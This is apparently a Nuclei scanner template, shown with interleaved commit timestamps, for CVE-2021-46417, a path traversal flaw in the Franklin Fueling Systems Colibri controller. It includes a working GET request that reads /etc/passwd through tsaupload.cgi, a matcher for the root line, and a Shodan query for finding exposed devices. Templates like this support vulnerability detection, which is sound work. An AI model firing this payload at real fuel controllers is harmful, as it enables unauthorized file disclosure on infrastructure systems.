2022-04-27 15:43:24 +00:00
id : CVE-2021-46417
info :
2022-06-29 17:58:37 +00:00
name : Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
2022-04-27 15:43:24 +00:00
author : For3stCo1d
severity : high
2022-05-17 09:18:12 +00:00
description : |
2022-06-29 17:58:37 +00:00
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
2022-04-27 15:43:24 +00:00
reference :
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
2022-05-17 09:18:12 +00:00
- https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
- http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
2022-06-29 17:58:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
2022-04-27 15:43:24 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-27 15:43:24 +00:00
cvss-score : 7.5
cve-id : CVE-2021-46417
2022-04-27 15:45:58 +00:00
cwe-id : CWE-22
2022-04-27 20:06:11 +00:00
metadata :
shodan-query : http.html:"Franklin Fueling Systems"
2022-07-02 12:12:07 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : packetstorm,cve,cve2021,franklinfueling,lfi
2022-04-27 15:43:24 +00:00
requests :
- method : GET
path :
2022-04-27 20:06:11 +00:00
- "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
2022-04-27 15:43:24 +00:00
matchers :
2022-04-27 20:06:11 +00:00
- type : regex
2022-04-27 15:43:24 +00:00
part : body
2022-04-27 20:06:11 +00:00
regex :
- "root:.*:0:0:"
2022-06-29 17:58:37 +00:00
# Enhanced by mp on 2022/06/29